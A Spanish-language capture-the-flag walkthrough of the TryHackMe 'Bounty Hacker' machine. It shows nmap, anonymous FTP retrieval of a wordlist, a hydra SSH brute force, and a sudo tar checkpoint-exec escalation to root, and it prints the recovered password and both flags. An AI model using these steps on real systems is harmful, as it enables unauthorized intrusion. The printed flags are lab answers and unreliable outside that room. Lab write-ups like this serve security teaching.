[TryHackMe] Bounty Hacker

Hoy vamos a hackear la maquina de TryHackMe llamada Bounty Hacker.Podeis descargarla desde el siguiente enlace: https://tryhackme.com/room/cowboyhacker
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 06:13 CEST Nmap scan report for Host is up (0.051s latency). Not shown: 967 filtered ports, 30 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff: | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA) | 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA) |_ 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 42.56 seconds
    Probamos a conectarnos al ftp con el usuario anonymous para ver si hay algo interesante.
    ~ > ftp Connected to 220 (vsFTPd 3.0.3) Name ( anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> dir 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 21:41 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 21:47 task.txt 226 Directory send OK.
    Vemos que hay 2 ficheros, locks.txt y task.txt. Los descargamos.
    ftp> get locks.txt local: locks.txt remote: locks.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for locks.txt (418 bytes). 226 Transfer complete. 418 bytes received in 0.05 secs (7.7949 kB/s) ftp> get task.txt local: task.txt remote: task.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for task.txt (68 bytes). 226 Transfer complete. 68 bytes received in 0.04 secs (1.4890 kB/s) ftp> exit 221 Goodbye.
    Miramos el contenido de task.txt.
    ~ > cat task.txt 1.) Protect Vicious. 2.) Plan for Red Eye pickup on the moon. -lin
    Podemos ver que esta "firmado" por alguien llamado lin. Miramos el contenido de locks.txt.
    ~ > cat locks.txt rEddrAGON ReDdr4g0nSynd!cat3 Dr@gOn$yn9icat3 R3DDr46ONSYndIC@Te ReddRA60N R3dDrag0nSynd1c4te dRa6oN5YNDiCATE ReDDR4g0n5ynDIc4te R3Dr4gOn2044 RedDr4gonSynd1cat3 R3dDRaG0Nsynd1c@T3 Synd1c4teDr@g0n reddRAg0N REddRaG0N5yNdIc47e Dra6oN$yndIC@t3 4L1mi6H71StHeB357 rEDdragOn$ynd1c473 DrAgoN5ynD1cATE ReDdrag0n$ynd1cate Dr@gOn$yND1C4Te RedDr@gonSyn9ic47e REd$yNdIc47e dr@goN5YNd1c@73 rEDdrAGOnSyNDiCat3 r3ddr@g0N ReDSynd1ca7e
    Parece que es un diccionario... Usamos hydra para ver si conseguimos la password de ssh del posible usuario "lin" usando el fichero locks.txt como diccionario.
    ~ > hydra -l lin -P locks.txt ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-08 06:36:31 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task [DATA] attacking ssh:// [22][ssh] host: login: lin password: RedDr4gonSynd1cat3 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 2 final worker threads did not complete until end. [ERROR] 2 targets did not resolve or could not be connected [ERROR] 0 targets did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-08 06:36:44
    Encontramos la password :) Nos loguemos con los credenciales que acabamos de obtener.
    ~ > ssh lin@ lin@'s password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 83 packages can be updated. 0 updates are security updates. Last login: Sun Jun 7 22:23:41 2020 from lin@bountyhacker:~/Desktop$
  • user.txt
  • Miramos en el directorio del usuario para obtener el fichero user.txt.
    lin@bountyhacker:~/Desktop$ ls user.txt lin@bountyhacker:~/Desktop$ cat user.txt THM{CR1M3_SyNd1C4T3}
    Miramos si podemos hacer algo con sudo.
    lin@bountyhacker:~/Desktop$ sudo -l [sudo] password for lin: Matching Defaults entries for lin on bountyhacker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User lin may run the following commands on bountyhacker: (root) /bin/tar
    Vemos que podemos usar el comando tar, asi que lo utilizaremos para escalar privilegios :)
    lin@bountyhacker:~/Desktop$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar: Removing leading `/' from member names # id uid=0(root) gid=0(root) groups=0(root)
  • root.txt
  • Obtenemos el root.txt.
    # cd /root # ls root.txt # cat root.txt THM{80UN7Y_h4cK3r}
  • End
  • Con esto, ya habriamos finalizado la maquina :)